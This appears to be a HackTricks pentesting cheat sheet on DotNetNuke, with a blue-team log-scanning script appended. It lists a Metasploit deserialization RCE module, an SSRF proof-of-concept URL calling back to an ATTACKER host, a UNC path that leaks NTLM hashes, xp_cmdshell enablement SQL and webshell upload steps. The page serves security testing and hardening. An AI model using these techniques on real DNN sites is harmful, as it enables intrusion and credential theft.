# DotNetNuke (DNN)

{{#include ../../banners/hacktricks-training.md}}

## DotNetNuke (DNN)

Logging in to DNN as **administrator** makes obtaining **RCE** easy, but a number of *unauthenticated* and *post-auth* techniques have also been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.

---

## Version & Environment Enumeration

* Check the *X-DNN* HTTP response header – it usually discloses the exact platform version.
* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` to low-privilege users.
* Typical cookies you will see on a live instance:
  * `.DOTNETNUKE` – ASP.NET forms authentication ticket.
  * `DNNPersonalization` – contains XML/serialized user profile data (old versions – see RCE below).

---

## Unauthenticated Exploitation

### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)

*Affected versions ≤ 9.3.0-RC*

`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.

```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS
msf> set LHOST
msf> run
```

The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works **without authentication** on 7.x–9.1.x and with a *verified* low-privilege account on 9.2.x+.

### 2. Server-Side Request Forgery (CVE-2025-32372)

*Affected versions < 9.13.8 – Patch released April 2025*

A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server into issuing **arbitrary GET requests** (semi-blind SSRF). Practical impacts:

* Internal port scan / metadata service discovery in cloud deployments.
* Reach hosts otherwise firewalled from the Internet.

Proof-of-concept (replace `TARGET` & `ATTACKER`):

```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```

The request is triggered in the background; monitor your listener for callbacks.

### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)

*Affected versions 6.0.0 – 9.x (< 10.0.1)*

Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to **10.0.1** or disable outbound SMB at the firewall.

### 4. IP Filter Bypass (CVE-2025-52487)

If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed by manipulating `X-Forwarded-For` in a reverse-proxy scenario.

---

## Post-Authentication to RCE

### Via SQL console

Under **`Settings → SQL`** a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands:

```sql
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```

### Via ASPX webshell upload

1. Go to **`Settings → Security → More → More Security Settings`**.
2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
4. Trigger it at **`/Portals/0/shell.aspx`**.

---

## Privilege Escalation on Windows

Once code execution is achieved as the `IIS AppPool\` application-pool identity, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:

* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
* **Juicy/Sharp Potatoes** to escape *Service Accounts*.

---

## Hardening Recommendations (Blue Team)

* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues).
* Remove residual **`InstallWizard.aspx*`** files after installation.
* Disable outbound SMB (ports 445/139) egress.
* Enforce strong *Host Filters* on the edge proxy rather than within DNN.
* Block access to `/API/RemoteContentProxy` if unused.

## References

* Metasploit `dnn_cookie_deserialization_rce` module documentation – practical unauthenticated RCE details (GitHub).
* GitHub Security Advisory GHSA-3f7v-qx94-666m – 2025 SSRF bypass & patch information.

{{#include ../../banners/hacktricks-training.md}}
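As a blue-team companion to the SSRF and enumeration notes above, here is an added example (not from this page or the DNN project) that scans IIS W3C log lines for `RemoteContentProxy` fetches to hosts outside an allowlist and for hits on the install wizard. The allowlist, the log field order and the log lines themselves are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs
import ipaddress

# Hosts the RemoteContentProxy endpoint may legitimately fetch from (assumed allowlist).
ALLOWED_PROXY_HOSTS = {"cdn.example.com"}

# Constructed IIS W3C log lines; assumed field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_IIS_LOG = """\
2025-05-01 10:00:01 10.0.0.5 GET /API/RemoteContentProxy url=http://cdn.example.com/site.css 443 - 198.51.100.3 Mozilla/5.0 200
2025-05-01 10:00:02 10.0.0.5 GET /API/RemoteContentProxy url=http://callback.example:8080/poc 443 - 203.0.113.7 curl/8.0 200
2025-05-01 10:00:03 10.0.0.5 GET /API/RemoteContentProxy url=http://169.254.169.254/latest/meta-data/ 443 - 203.0.113.7 curl/8.0 200
2025-05-01 10:00:04 10.0.0.5 GET /API/RemoteContentProxy url=http%3A%2F%2F10.0.0.20%3A8080%2F 443 - 203.0.113.7 curl/8.0 200
2025-05-01 10:00:05 10.0.0.5 GET /Install/Install.aspx mode=install 443 - 203.0.113.7 python-requests/2.31 200
2025-05-01 10:00:06 10.0.0.5 GET /Portals/0/logo.png - 443 - 198.51.100.3 Mozilla/5.0 200
"""

def _is_internal(host):
    """True for loopback, link-local (cloud metadata) and RFC1918 targets."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name: treated as external unless allowlisted
    return ip.is_loopback or ip.is_link_local or ip.is_private

def analyse_line(line):
    """Return (finding, client_ip, detail) for a suspicious request, else None."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 11:
        return None
    stem, query, client = parts[4].lower(), parts[5], parts[8]
    if stem == "/api/remotecontentproxy":
        # parse_qs percent-decodes the value, so encoded targets are normalised too
        target = parse_qs(query).get("url", [""])[0]
        host = urlsplit(target).hostname or ""
        if host not in ALLOWED_PROXY_HOSTS:
            kind = "ssrf-internal" if _is_internal(host) else "ssrf-external"
            return (kind, client, target)
    if stem.startswith("/install/"):
        # the install wizard should be unreachable on a deployed site
        return ("install-wizard-probe", client, parts[4])
    return None

def scan(log_text):
    """Run analyse_line over a whole log and collect the findings in order."""
    return [f for f in map(analyse_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for kind, client, detail in scan(SAMPLE_IIS_LOG):
        print(f"{kind:22} from {client:15} -> {detail}")
```

The same check can be fed a real log by reading the file and calling `scan()`, after adjusting the field indices to the `#Fields:` header of that log.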